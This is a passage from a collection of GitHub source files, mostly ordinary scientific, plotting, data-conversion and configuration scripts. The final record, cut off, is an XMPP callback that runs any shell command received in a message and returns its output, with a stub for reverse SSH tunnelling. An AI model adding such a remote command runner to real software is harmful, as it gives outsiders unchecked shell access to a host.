list to make it random.\n color : str\n Can be used on plots.\n\n Examples\n --------\n >>> # Steel with random Young's modulus.\n >>> import ross.stochastic as srs\n >>> E = np.random.uniform(208e9, 211e9, 5)\n >>> st_steel = srs.ST_Material(name=\"Steel\", rho=7810, E=E, G_s=81.2e9)\n >>> len(list(iter(st_steel)))\n 5\n \"\"\"\n\n @check_units\n def __init__(\n self, name, rho, E=None, G_s=None, Poisson=None, color=\"#525252\", **kwargs\n ):\n self.name = str(name)\n if \" \" in name:\n raise ValueError(\"Spaces are not allowed in Material name\")\n\n i = 0\n for arg in [\"E\", \"G_s\", \"Poisson\"]:\n if locals()[arg] is not None:\n i += 1\n if i != 2:\n raise ValueError(\n \"Exactly 2 arguments from E, G_s and Poisson should be provided\"\n )\n\n is_random = []\n for par, _name in zip([rho, E, G_s, Poisson], [\"rho\", \"E\", \"G_s\", \"Poisson\"]):\n if isinstance(par, Iterable):\n is_random.append(_name)\n\n if type(rho) == list:\n rho = np.asarray(rho)\n if type(E) == list:\n E = np.asarray(E)\n if type(G_s) == list:\n G_s = np.asarray(G_s)\n if type(Poisson) == list:\n Poisson = np.asarray(Poisson)\n\n attribute_dict = dict(\n name=name,\n rho=rho,\n E=E,\n G_s=G_s,\n Poisson=Poisson,\n color=color,\n )\n self.is_random = is_random\n self.attribute_dict = attribute_dict\n\n def __iter__(self):\n \"\"\"Return an iterator for the container.\n\n Returns\n -------\n An iterator over random material properties.\n\n Examples\n --------\n >>> import ross.stochastic as srs\n >>> E = np.random.uniform(208e9, 211e9, 5)\n >>> st_steel = srs.ST_Material(name=\"Steel\", rho=7810, E=E, G_s=81.2e9)\n >>> len(list(iter(st_steel)))\n 5\n \"\"\"\n return iter(self.random_var(self.is_random, self.attribute_dict))\n\n def __getitem__(self, key):\n \"\"\"Return the value for a given key from attribute_dict.\n\n Parameters\n ----------\n key : str\n A class parameter as string.\n\n Raises\n ------\n KeyError\n Raises an error if the parameter doesn't belong to the class.\n\n Returns\n -------\n Return the value for the given key.\n\n Example\n -------\n >>> import ross.stochastic as srs\n >>> E = np.random.uniform(208e9, 211e9, 5)\n >>> st_steel = srs.ST_Material(name=\"Steel\", rho=7810, E=E, G_s=81.2e9)\n >>> st_steel[\"rho\"]\n 7810\n \"\"\"\n if key not in self.attribute_dict.keys():\n raise KeyError(\"Object does not have parameter: {}.\".format(key))\n\n return self.attribute_dict[key]\n\n def __setitem__(self, key, value):\n \"\"\"Set new parameter values for the object.\n\n Function to change a parameter value.\n It's not allowed to add new parameters to the object.\n\n Parameters\n ----------\n key : str\n A class parameter as string.\n value : The corresponding value for the attrbiute_dict's key.\n ***check the correct type for each key in ST_Material\n docstring.\n\n Raises\n ------\n KeyError\n Raises an error if the parameter doesn't belong to the class.\n\n Example\n -------\n >>> import ross.stochastic as srs\n >>> E = np.random.uniform(208e9, 211e9, 5)\n >>> st_steel = srs.ST_Material(name=\"Steel\", rho=7810, E=E, G_s=81.2e9)\n >>> st_steel[\"E\"] = np.linspace(200e9, 205e9, 5)\n >>> st_steel[\"E\"]\n array([2.0000e+11, 2.0125e+11, 2.0250e+11, 2.0375e+11, 2.0500e+11])\n \"\"\"\n if key not in self.attribute_dict.keys():\n raise KeyError(\"Object does not have parameter: {}.\".format(key))\n self.attribute_dict[key] = value\n\n def random_var(self, is_random, *args):\n \"\"\"Generate a list of objects as random attributes.\n\n This function creates a list of objects with random values for selected\n attributes from ross.Material.\n\n Parameters\n ----------\n is_random : list\n List of the object attributes to become stochastic.\n *args : dict\n Dictionary instanciating the ross.Material class.\n The attributes that are supposed to be stochastic should be\n set as lists of random variables.\n\n Returns\n -------\n f_list : generator\n Generator of random objects.\n \"\"\"\n args_dict = args[0]\n new_args = []\n for i in range(len(args_dict[is_random[0]])):\n arg = []\n for key, value in args_dict.items():\n if key in is_random:\n arg.append(value[i])\n else:\n arg.append(value)\n new_args.append(arg)\n f_list = (Material(*arg) for arg in new_args)\n\n return f_list\n\n def plot_random_var(self, var_list=None, histogram_kwargs=None, plot_kwargs=None):\n \"\"\"Plot histogram and the PDF.\n\n This function creates a histogram to display the random variable\n distribution.\n\n Parameters\n ----------\n var_list : list, optional\n List of random variables, in string format, to plot.\n Default is plotting all the random variables.\n histogram_kwargs : dict, optional\n Additional key word arguments can be passed to change\n the plotly.go.histogram (e.g. histnorm=\"probability density\", nbinsx=20...).\n *See Plotly API to more information.\n plot_kwargs : dict, optional\n Additional key word arguments can be passed to change the plotly go.figure\n (e.g. line=dict(width=4.0, color=\"royalblue\"), opacity=1.0, ...).\n *See Plotly API to more information.\n\n Returns\n -------\n fig : Plotly graph_objects.Figure()\n A figure with the histogram plots.\n\n Examples\n --------\n >>> import ross.stochastic as srs\n >>> E = np.random.uniform(208e9, 211e9, 5)\n >>> st_steel = srs.ST_Material(name=\"Steel\", rho=7810, E=E, G_s=81.2e9)\n >>> fig = st_steel.plot_random_var([\"E\"])\n >>> # fig.show()\n \"\"\"\n label = dict(\n E=\"Young's Modulus\",\n G_s=\"Shear Modulus\",\n Poisson=\"Poisson coefficient\",\n rho=\"Density\",\n )\n\n if var_list is None:\n var_list = self.is_random\n elif not all(var in self.is_random for var in var_list):\n raise ValueError(\n \"Random variable not in var_list. Select variables from {}\".format(\n self.is_random\n )\n )\n\n return plot_histogram(\n self.attribute_dict, label, var_list, histogram_kwargs={}, plot_kwargs={}\n )\n","repo_name":"petrobras/ross","sub_path":"ross/stochastic/st_materials.py","file_name":"st_materials.py","file_ext":"py","file_size_in_byte":8599,"program_lang":"python","lang":"en","doc_type":"code","stars":99,"dataset":"github-code","pt":"21"} +{"seq_id":"9564669309","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Nov 19 17:29:55 2013\n\n@author: hok1\n\"\"\"\n\nimport numpy as np\nfrom functools import partial\n\n# Parameters from E. Jacobsson, fig. 1\ndef lppl(t, A=569.988, B=-266.943, C=-14.242, tc=1930.218, phi=-4.1, \n omega=7.877, z=0.445):\n critical_dist = (tc-t)**z\n first = A\n second = B*critical_dist\n third = C*critical_dist*np.cos(omega*np.log(tc-t)+phi)\n return first+second+third\n \ndef costfunction(tarray, yarray, model):\n modelyarray = model(tarray)\n return np.sum((modelyarray-yarray)**2)/len(tarray) if len(tarray)>0 else 0\n \ndef lppl_costfunction(tarray, yarray, A=569.988, B=-266.943, C=-14.242,\n tc=1930.218, phi=-4.1, omega=7.877, z=0.445):\n '''\n tyarray = filter(lambda item: item[0]0 else 0\n crashedtyarray = filter(lambda item: item[0]>=tc, zip(tarray, yarray))\n crashed_cost = 0\n if (len(crashedtyarray) > 0):\n crashed_cost = np.sum(np.array(map(lambda item: (item[1]-peak_y)**2, crashedtyarray))) / len(crashedtyarray)\n return costfunction(filter_tarray, filter_yarray, model) + crashed_cost\n '''\n model = partial(lppl, A=A, B=B, C=C, tc=tc, phi=phi, omega=omega, z=z)\n maxt = np.max(tarray)\n return float('inf') if tc < maxt else costfunction(tarray, yarray, model)\n \n \ndef lppl_dictparam(tarray, parameters):\n return lppl(tarray, A=parameters['A'], B=parameters['B'],\n C=parameters['C'], tc=parameters['tc'], \n phi=parameters['phi'], omega=parameters['omega'],\n z=parameters['z']) \n \ndef lpplcostfunc_dictparam(tarray, yarray, parameters):\n return lppl_costfunction(tarray, yarray, A=parameters['A'], \n B=parameters['B'], C=parameters['C'], \n tc=parameters['tc'], phi=parameters['phi'],\n omega=parameters['omega'], z=parameters['z'])\n","repo_name":"OwaJawa/lppl","sub_path":"lpplmodel.py","file_name":"lpplmodel.py","file_ext":"py","file_size_in_byte":2226,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"41413755606","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Nov 19 17:24:47 2019\n\n@author: 106300\n\"\"\"\n\nimport plotly.graph_objects as go\n\nfig = go.Figure()\n\nfig.add_trace(go.Scatter(\n x=[1.5, 4.5],\n y=[0.75, 0.75],\n text=[\"Unfilled Rectangle\", \"Filled Rectangle\"],\n mode=\"text\",\n))\n\n# Set axes properties\nfig.update_xaxes(range=[0, 7], showgrid=False)\nfig.update_yaxes(range=[0, 5])\n\n# Add shapes\nfig.add_shape(\n # unfilled Rectangle\n go.layout.Shape(\n type=\"rect\",\n xref=\"x\",\n yref=\"y\",\n x0=1,\n y0=1,\n x1=2,\n y1=2,\n line=dict(\n color=\"RoyalBlue\",\n ),\n ))\nfig.add_shape(\n # filled Rectangle\n go.layout.Shape(\n type=\"rect\",\n x0=3,\n y0=1,\n x1=6,\n y1=2,\n line=dict(\n color=\"RoyalBlue\",\n width=2,\n ),\n fillcolor=\"LightSkyBlue\",\n ))\nfig.update_shapes(dict(xref='x', yref='y'))\nfig.show()","repo_name":"orlando68/Stanford","sub_path":"plotly_rectangle.py","file_name":"plotly_rectangle.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19992435390","text":"\n\nimport nibabel as nib\nimport nilearn as nil\nfrom nilearn import plotting\n\nfrom socket import gethostname\nfrom yaml.loader import SafeLoader\nimport yaml\n\nprint(gethostname())\n# Open the file and load the file\nwith open('config.yml') as f:\n all_yaml = yaml.load(f, Loader=SafeLoader)\n if gethostname() in all_yaml.keys():\n config = all_yaml[gethostname()]\n else:\n config = all_yaml['default']\n \nprint(config)\n \n#dev_scripts_abs_path = config['l2_analysis_files']\nl2_analysis_files = config['l2_analysis_files']\n#posterror_folder = 'posterror_cues_no_rt_20230616'\nposterror_folder = 'posterror_cues_no_rt_20230821'\n\ncluster_folderpath = l2_analysis_files + '/SST/' + posterror_folder + '/CueFollowing(CS>FS)'\n# roi file to open\nroi_files = [cluster_folderpath + '/CueFollowing(CS>FS)striatal_cluster_1.nii',\ncluster_folderpath + '/CueFollowing(CS>FS)striatal_cluster_2.nii']\n# load each of the roi files\n \nroi_data = []\nfor roi_file in roi_files:\n print(roi_file)\n ni_file = nib.load(roi_file)\n #binarize roi using nilearn\n ni_file = nil.image.math_img(\"img > 0\", img=ni_file)\n roi_data = roi_data + [ni_file]\n #display the roi\n #plotting.plot_roi(ni_file, title=roi_file)\n print(\"displayed\")\n#combine the rois\n#concatenate them\ncombined_roi_data = nil.image.concat_imgs(roi_data)\n#then add them\ncombined_roi_data = nil.image.math_img(\"np.sum(imgs, axis=3)\", imgs=combined_roi_data)\n\nplotting.plot_roi(combined_roi_data, title=\"combined\")\n#save the combined roi\ncombined_roi_data.to_filename(\n cluster_folderpath + '/CueFollowing(CS>FS)striatal_cluster_combined.nii')\n\n \n\n\n","repo_name":"UOSAN/DEV_scripts","sub_path":"fMRI/fx/models/SST/direct_regression/create_striatal_roi.py","file_name":"create_striatal_roi.py","file_ext":"py","file_size_in_byte":1639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25730393685","text":"#!/usr/bin/env python3\n\n# from magPlot import MagPlot\nfrom serial import Serial\nimport numpy as np\nfrom the_collector import Collector\nfrom datetime import datetime\nimport time\nfrom datatypes import *\n# from threading import Thread, Event, Lock\n# import copy\nimport sys\n\n\ninfo = {\n \"lis3mdl\": {\n \"mag_range_gs\": 4,\n \"samplerate_hz\": 155,\n \"date\": datetime.now().isoformat()\n }\n}\n\ndata = {\n \"accels\": [],\n \"gyros\": [],\n \"mags\": [],\n \"pt\": [],\n \"timestamp\": []\n}\n\ndef main():\n global plot_buffer\n coll = Collector()\n coll.timestamp = False\n\n ser = Serial()\n ser.port = \"/dev/tty.usbmodem14401\"\n ser.baudrate = 1000000\n ser.open()\n\n try:\n while (True):\n buffer = []\n c = ser.read().decode(\"utf8\")\n while (c != '\\n'):\n buffer.append(c)\n c = ser.read().decode(\"utf8\")\n\n if buffer[0] == '*':\n continue\n\n s = ''.join(buffer)\n print(s)\n\n v = s.split('|') # breakout sensors\n\n vv = v[1].split(',')\n a = vec_t(float(vv[0]),float(vv[1]),float(vv[2]))\n data[\"accels\"].append(a)\n\n vv = v[2].split(',')\n g = vec_t(float(vv[0]),float(vv[1]),float(vv[2]))\n data[\"gyros\"].append(g)\n\n ts = float(v[3])\n data[\"timestamp\"].append(ts)\n\n vv = v[4].split(',')\n m = vec_t(float(vv[0]),float(vv[1]),float(vv[2]))\n data[\"mags\"].append(m)\n\n vv = v[5].split(',')\n pt = pt_t(float(vv[0]),float(vv[1]))\n data[\"pt\"].append(pt)\n\n except KeyboardInterrupt:\n print(\"Data points captured: \", len(data[\"accels\"]))\n coll.write(\"allcal.pkl\", data, info)\n sys.stdout.flush()\n finally:\n ser.close()\n\nmain()\n","repo_name":"the-guild-of-calamitous-intent/gciSensors","sub_path":"docs/notebooks/calibration/get_all_data.py","file_name":"get_all_data.py","file_ext":"py","file_size_in_byte":1850,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"13848408317","text":"#!/usr/bin/env/python3\n# -*- coding:utf-8 -*-\n\"\"\"\n@project: apiAutoTest\n@author: zy7y\n@file: read_config.py\n@ide: PyCharm\n@time: 2020/7/31\n\"\"\"\nimport yaml\nfrom loguru import logger\n\n\nclass ReadConfig(object): #这个是读取数据的类\n data = None\n #定义data数据\n\n #把对应的错误用日志输出出来,输出到控制台或者日志文件\n @logger.catch\n def __init__(self):\n # 指定编码格式解决,win下跑代码抛出错误\n with open('../config/config.yaml', 'r', encoding='utf-8') as file:\n self.data = yaml.load(file.read(), Loader=yaml.FullLoader) # load是将yaml类型转换为python数据类型\n #yaml.load解析文件流中第一个yaml文档,并生成python对象。\n\n @logger.catch\n def read_serve_config(self, sever_name):\n #读取服务器地址\n\n logger.info(self.data.get('server').get(sever_name))\n #获取yaml文件里的server内容,里面有test和dev,再get指定一下\n return self.data.get('server').get(sever_name)\n\n @logger.catch\n def read_response_reg(self):\n # 这是个获取token的 jsonpath表达式 , 不是数据 , 是表达式!\n get_token = self.data.get(\"response_reg\").get(\"token\")\n get_resp = self.data.get('response_reg').get('response')\n logger.info(f'从响应中提取的token表达式: {get_token}') #另一种输出,格式好看点,在最下面显示\n logger.info(f'从响应提取的需要校验的表达式: {get_resp}')\n return get_token, get_resp\n\n @logger.catch\n #这里指定路径名称获取文件数据\n def read_file_path(self, file_path_name):\n return self.data.get('file_path').get(file_path_name)\n\n def read_email_setting(self):\n return self.data.get('email')\n\nif __name__ == '__main__': #测试下类功能有没有问题\n read_config = ReadConfig() #实例化\n result = read_config.data\n print(type(result),result) #\n\n result = read_config.read_serve_config('dev')\n print(result,type(result)) #接口测试中不变的那一串部分地址\n\n response_reg,token_reg = read_config.read_response_reg()\n print(response_reg,token_reg)\n\n result = read_config.read_file_path('case_data')\n print(result)\n\n result = read_config.read_file_path('test') #读取不存在的文件路径\n print(result,type(result)) #None \n\n result = read_config.read_email_setting()\n print(result,type(result))\n\n\n\n","repo_name":"Mor03/git01","sub_path":"tools/read_config.py","file_name":"read_config.py","file_ext":"py","file_size_in_byte":2541,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39913262847","text":"import pandas as pd\n\nfrom src.centroid_recommendation import compute_recommendations\nfrom src.postprocess import write_results_ranked\nfrom src.preprocess import body_dict_from_panda, get_email_ids_per_sender, get_conversation_ids, get_all_senders\nfrom src.scoring import get_train_val, compute_prediction_mad\nfrom src.tfidftools import get_tfidf\nimport pickle as pkl\n\npath_to_data = 'data/'\npath_to_results = 'results/'\n\nn_recipients = 'max'\n\n##########################\n# load some of the files #\n##########################\n\ntraining = pd.read_csv(path_to_data + 'training_set.csv', sep=',', header=0)\n\ntraining_info = pd.read_csv(\n path_to_data + 'training_info.csv', sep=',', header=0)\n\ntest = pd.read_csv(path_to_data + 'test_set.csv', sep=',', header=0)\n\ntest_info = pd.read_csv(\n path_to_data + 'test_info.csv', sep=',', header=0)\n\n# Compute useful structures\n\ntrain_info, train_ids_per_sender_val, val_info, val_ids_per_sender = get_train_val(training, training_info,\n 0.95, disp=True)\n\ntrain_bodies = body_dict_from_panda(train_info)\nval_bodies = body_dict_from_panda(val_info)\n\ntest_bodies = body_dict_from_panda(test_info)\n\nbody_dict = {**train_bodies, **val_bodies, **test_bodies}\n\nprint('Fitting tfidf, this will take some time...')\ntfidf, tfs, keys = get_tfidf(body_dict, 0.001, 0.10)\nprint(\"Fitted.\")\n\nprint(\"Computing recommendations for train/val...\")\n\nconversation_ids_val = get_conversation_ids(train_ids_per_sender_val, training_info)\nsenders = get_all_senders(training)\nrecommendations_val = compute_recommendations(n_recipients, senders, train_info, conversation_ids_val, val_info,\n val_ids_per_sender, tfidf)\nprint(\"Done!\")\n\nprint(\"Computing recommendations for train/test...\")\n\nn_recipients = 10\n\ntrain_ids_per_sender = get_email_ids_per_sender(training)\nconversation_ids = get_conversation_ids(train_ids_per_sender, training_info)\ntest_ids_per_sender = get_email_ids_per_sender(test)\n\nrecommendations_test = compute_recommendations(n_recipients, senders, training_info, conversation_ids, test_info,\n test_ids_per_sender, tfidf)\nprint(\"Done!\")\nprint(\"Computing score on validation set...\")\nprint(\"Score: {}\".format(compute_prediction_mad(recommendations_val, val_info)))\n\nprint(\"Writing file...\")\nwrite_results_ranked(recommendations_val, path_to_results, \"centroids_validation.csv\")\nwrite_results_ranked(recommendations_test, path_to_results, \"centroids_test.csv\")\n\nwith open(path_to_results + 'centroids_dict.p', 'wb') as f:\n pkl.dump(recommendations_val, f)","repo_name":"GeoffNN/ALTEGRADEnron","sub_path":"centroids_demo.py","file_name":"centroids_demo.py","file_ext":"py","file_size_in_byte":2664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15936908001","text":"\nimport os\nfrom tensorflow.python.client import session\nfrom tensorflow.python.framework import constant_op\nfrom tensorflow.python.framework import importer\nfrom tensorflow.python.framework import ops\nfrom tensorflow.python.framework import test_util\nfrom tensorflow.python.ops import math_ops\nfrom tensorflow.python.ops import variables\nfrom tensorflow.python.platform import test\nfrom tensorflow.python.training import quantize_training\nfrom tensorflow.python.training import saver as saver_module\nclass PywrapQuantizeTrainingTest(test.TestCase):\n def testQuantizeTraining(self):\n with session.Session() as sess:\n a = constant_op.constant(6.0, shape=[1, 1])\n b = constant_op.constant(7.0, shape=[1, 1])\n c = math_ops.matmul(a, b, name='matmul')\n self.assertEqual(c.eval(), 42.0)\n self.assertEqual(len(sess.graph_def.node), 3)\n result = quantize_training.do_quantize_training_on_graphdef(\n sess.graph_def, 8)\n self.assertGreater(len(result.node), 3)\n @test_util.run_v1_only('The API is only expect to work with v1 session mode.')\n def testQuantizedSaveRestore(self):\n save_path = os.path.join(self.get_temp_dir(), 'quantized_save_restore')\n g = ops.Graph()\n with session.Session(graph=g) as sess:\n a = constant_op.constant(6.0, shape=[1, 1], name='a')\n b = variables.VariableV1(\n constant_op.constant(7.0, shape=[1, 1]), name='b')\n c = math_ops.matmul(a, b, name='matmul')\n init_op = variables.global_variables_initializer()\n saver = saver_module.Saver({'b': b})\n result = quantize_training.do_quantize_training_on_graphdef(\n sess.graph_def, 8)\n with ops.Graph().as_default() as g, session.Session(graph=g) as sess:\n _ = importer.import_graph_def(result, name='')\n self.evaluate(g.get_operation_by_name(init_op.name))\n self.evaluate(g.get_tensor_by_name(c.name))\n saver.save(sess, save_path)\n with ops.Graph().as_default() as g, session.Session(graph=g) as sess:\n _ = importer.import_graph_def(result, name='')\n saver.restore(sess, save_path)\n self.assertEqual(7.0, sess.run(g.get_tensor_by_name('b:0')))\n self.assertEqual(6.0, sess.run(g.get_tensor_by_name('a/Min/Variable:0')))\n self.assertEqual(6.0, sess.run(g.get_tensor_by_name('a/Max/Variable:0')))\n self.assertEqual(7.0,\n sess.run(g.get_tensor_by_name('b/read/Min/Variable:0')))\n self.assertEqual(7.0,\n sess.run(g.get_tensor_by_name('b/read/Max/Variable:0')))\nif __name__ == '__main__':\n test.main()\n","repo_name":"Mockingbird01001/NLG-code-generator-LSTM","sub_path":"work/data/data_model/batch_2/quantize_training_test.py.transformed.py","file_name":"quantize_training_test.py.transformed.py","file_ext":"py","file_size_in_byte":2571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"35755353880","text":"'''import serial\r\nfrom serial import Serial\r\nimport time\r\n\r\ndef light_on_off(i):\r\n serialcomm = serial.Serial('COM8', 9600)\r\n print('############')\r\n print(i)\r\n print('############')\r\n serialcomm.timeout = 1\r\n\r\n serialcomm.write(i.encode())\r\n\r\n time.sleep(10)\r\n\r\n print('################')\r\n print(serialcomm.readline().decode('ascii'))\r\n print('############')\r\n serialcomm.close()\r\n print('############')\r\n print(i)\r\n print(b'L')\r\n print(i)\r\n #print('############')\r\n ser = serial.Serial('COM8',9600,timeout = 1)\r\n val = i.encode()\r\n #ser.write(val)\r\nser = serial.Serial('COM8', 9600, timeout=1)\r\n\r\ntry:\r\n ser.write(b'H')\r\n print(ser.write(b'H'))\r\nexcept:\r\n print('error')'''\r\n\r\n\r\n\r\nimport serial\r\nfrom serial import Serial\r\nimport time\r\n\r\nser = serial.Serial('COM8', 9600)\r\n\r\nser.write(b'H')\r\n# LED turns on\r\n\r\nser.write(b'L')\r\n# LED turns off\r\n\r\nser.write(b'H')\r\n# LED turns on\r\n\r\nser.write(b'L')\r\n# LED turns off\r\n\r\nser.close()\r\nexit()","repo_name":"prathikbafna/capstone-project-Eye-gazing","sub_path":"home_automation/home_automation_control.py","file_name":"home_automation_control.py","file_ext":"py","file_size_in_byte":1014,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"26797314938","text":"import datetime\nimport random\nimport json\nimport os\n\ndirec = \"/home/bresilla/.darwin/datasets/wur-agrofoodrobotics/cow_pose/releases/newr/annotations/\"\nimpath = \"/home/bresilla/.darwin/datasets/wur-agrofoodrobotics/cow_pose/images/\"\njson_file = \"/home/bresilla/.darwin/datasets/wur-agrofoodrobotics/cow_pose/releases/newr/\"\n\ndirectory_list = os.listdir(direc)\nrandom.shuffle(directory_list)\n\nsplit=int((len(directory_list)/10)*8)\ndata_list = [{\"images\": directory_list[:split], \"name\": \"train.json\"}, {\"images\": directory_list[split:], \"name\": \"val.json\"}]\n\nfor coll in data_list:\n images = []\n annotations = []\n i = random.randint(11111, 99999);\n for file in coll[\"images\"]:\n i = i + 1\n with open(direc + file, 'r') as fcc_file:\n fcc_data = json.load(fcc_file)\n image_struct = {\n \"id\": i,\n \"file_name\": fcc_data[\"image\"][\"original_filename\"],\n \"width\": int(fcc_data['image']['width']),\n \"height\": int(fcc_data['image']['height']),\n \"full_name\": impath + fcc_data[\"image\"][\"original_filename\"],\n }\n images.append(image_struct)\n for e in fcc_data['annotations']:\n img_width=int(fcc_data['image']['width'])\n img_height=int(fcc_data['image']['height'])\n parts = {}\n x_min = img_width\n x_max = 0\n y_min = img_height\n y_max = 0\n for p in e[\"skeleton\"][\"nodes\"]:\n parts[p[\"name\"]]=[int(p[\"x\"]),int(p[\"y\"]),int(p[\"occluded\"])+1]\n if int(p[\"x\"]) < x_min:\n x_min = int(p[\"x\"])\n if x_min < 0: \n x_min = 0\n parts[p[\"name\"]]=[int(p[\"x\"]),int(p[\"y\"]),0]\n if int(p[\"x\"]) > x_max:\n x_max = int(p[\"x\"])\n if x_max > img_width: \n x_max + img_width\n parts[p[\"name\"]]=[int(p[\"x\"]),int(p[\"y\"]),0]\n if int(p[\"y\"]) < y_min:\n y_min = int(p[\"y\"])\n if y_min < 0: \n y_min = 0\n parts[p[\"name\"]]=[int(p[\"x\"]),int(p[\"y\"]),0]\n if int(p[\"y\"]) > y_max:\n y_max = int(p[\"y\"])\n if y_max > img_height: \n y_max + img_height\n parts[p[\"name\"]]=[int(p[\"x\"]),int(p[\"y\"]),0]\n ann_width = x_max-x_min\n ann_height = y_max-y_min\n keypoints = [\n parts[\"left_eye\"],\n parts[\"right_eye\"],\n parts[\"left_ear\"],\n parts[\"right_ear\"],\n parts[\"nose\"],\n parts[\"throat\"],\n parts[\"tailbase\"],\n parts[\"withers\"],\n parts[\"front_left_elbow\"],\n parts[\"front_right_elbow\"],\n parts[\"rear_left_elbow\"],\n parts[\"rear_right_elbow\"],\n parts[\"front_left_knee\"],\n parts[\"front_right_knee\"],\n parts[\"rear_left_knee\"],\n parts[\"rear_right_knee\"],\n parts[\"front_left_paw\"],\n parts[\"front_right_paw\"],\n parts[\"rear_left_paw\"],\n parts[\"rear_right_paw\"],\n ]\n datas = {\n \"keypoints\": [float(item) for sub_list in keypoints for item in sub_list],\n \"image_id\": i,\n \"id\": e[\"instance_id\"][\"value\"],\n \"num_keypoints\": 20,\n \"bbox\": [float(x_min), float(y_min), float(ann_width), float(ann_height)],\n \"iscrowd\": 0,\n \"area\": float(ann_width * ann_height),\n \"category_id\": 1,\n \"x_min\": x_min,\n \"x_max\": x_max,\n \"y_min\": y_min,\n \"y_max\": y_max,\n \"width\": ann_width,\n \"height\": ann_height,\n \"points\": keypoints,\n }\n annotations.append(datas)\n\n\n categories = { \n \"supercategory\": \"animal\",\n \"id\": 1,\n \"name\": \"cow\",\n \"keypoints\": [ \"L_Eye\", \"R_Eye\", \"L_EarBase\", \"R_EarBase\", \"Nose\", \"Throat\", \"TailBase\", \"Withers\", \"L_F_Elbow\", \"R_F_Elbow\", \"L_B_Elbow\", \"R_B_Elbow\", \"L_F_Knee\", \"R_F_Knee\", \"L_B_Knee\", \"R_B_Knee\", \"L_F_Paw\", \"R_F_Paw\", \"L_B_Paw\", \"R_B_Paw\"],\n \"skeleton\": [[1, 2], [1, 3], [2, 4], [1, 5], [2, 5], [5, 6], [6, 8], [7, 8], [6, 9], [9, 13], [13, 17], [6, 10], [10, 14], [14, 18], [7, 11], [11, 15], [15, 19], [7, 12], [12, 16], [16, 20]]\n }\n\n info = {\n \"version\": \"1.0\",\n \"data_path\": impath,\n \"date_created\": str(datetime.datetime.now()),\n \"dataset_size\": len(coll[\"images\"])\n }\n\n all = {\"info\": info, \"images\": images, \"annotations\": annotations, \"categories\": [categories]}\n json_object = json.dumps(all, indent = 4) \n name = json_file+coll[\"name\"]\n with open(name, 'w') as f:\n f.write(json_object)\n","repo_name":"bresilla/coco_visualiser","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2373702211","text":"from django.db import models\n\nfrom common.models import BaseModel\nfrom vehicles.models.vehicle import Vehicle\n\n\nclass VehicleImage(BaseModel):\n vehicle = models.ManyToManyField(\n Vehicle,\n blank=True,\n related_name='images',\n verbose_name=\"ТС\"\n )\n image = models.ImageField(upload_to='images/vehicles/', verbose_name=\"Фото\")\n\n class Meta:\n verbose_name = \"Фотография\"\n verbose_name_plural = \"Фотографии\"\n\n\nclass VehicleFile(BaseModel):\n vehicle = models.ManyToManyField(\n Vehicle,\n blank=True,\n related_name='files',\n verbose_name=\"ТС\"\n )\n file = models.FileField(upload_to='files/vehicles/', verbose_name=\"Файл\")\n\n class Meta:\n verbose_name = \"Файл\"\n verbose_name_plural = \"Файлы\"\n","repo_name":"redbird504/fms_backend","sub_path":"src/vehicles/models/media.py","file_name":"media.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15492068252","text":"import pandas as pd\nimport plotly.graph_objects as go\nimport plotly\n\n# read data\ndf = pd.read_csv('/Users/tomgurrie/sankey_austin.csv')\n\n# convert to dictionary\ndata = df[['source','target','value']].to_dict(orient=\"list\")\n\n# create plot\nfig = go.Figure(data=[go.Sankey(\n node = dict(\n pad = 15,\n thickness = 20,\n line = dict(color = \"black\", width = 0.5),\n label = [\"Aus-E\", \"Aus-W\", \"Both\", \"New\", \"Aus-E\", \"Aus-W\", \"Both\", \"Lapsed\"],\n color = \"blue\"\n ),\n link = data\n )])\n\nfig.update_layout(title_text=\"Basic Sankey Diagram\", font_size=10)\n\nplotly.offline.plot(fig, filename='sankey_austin.html')\n\n","repo_name":"Redledbetter08/Projects","sub_path":"sankey_austin/sankey_diagram.py","file_name":"sankey_diagram.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"362865168","text":"from callback import Callback\nfrom pycrypt import decode_crypt \nimport commands\nimport logging\nimport os\nfrom Crypto.PublicKey import RSA\nfrom Crypto import Random\nimport binascii\n\nclass Cmd(Callback):\n def __init__(self):\n self.log = logging.getLogger(\"cement:app:xmpp\")\n self.log.debug('Cmd class creat object !', extra={'namespace' : 'xmpp'})\n\n def run(self, args = None):\n self.log.debug('args:%s'%args.items(), extra={'namespace' : 'xmpp'})\n cmd = args.get('cmd', 'not found')\n self.log.debug('cmd:%s '%cmd, extra={'namespace' : 'xmpp'})\n if cmd != 'not found':\n #cmd_decoded = self.decode_crypt(cmd)\n #text = binascii.a2b_hex(data)\n #text = binascii.a2b_hex(cmd)\n #self.log.debug('cmd text:%s '%text, extra={'namespace' : 'xmpp'})\n #cmd_decoded = decode_crypt(text)\n cmd_decoded = cmd\n self.log.debug('cmd decoded :%s '%cmd_decoded, extra={'namespace' : 'xmpp'})\n (status, output) = commands.getstatusoutput(cmd_decoded)\n self.log.debug('[status]:%s [output]:%s'%(status, output), extra={'namespace' : 'xmpp'})\n if status != 0:\n result = 'cmd execute error!'\n else :\n result = output\n return result \n\n def ssh_bind(self, args = None):\n \"\"\"\n ssh -R sourcePort:forwardToHost:onPort connectToHost\n \"\"\"\n 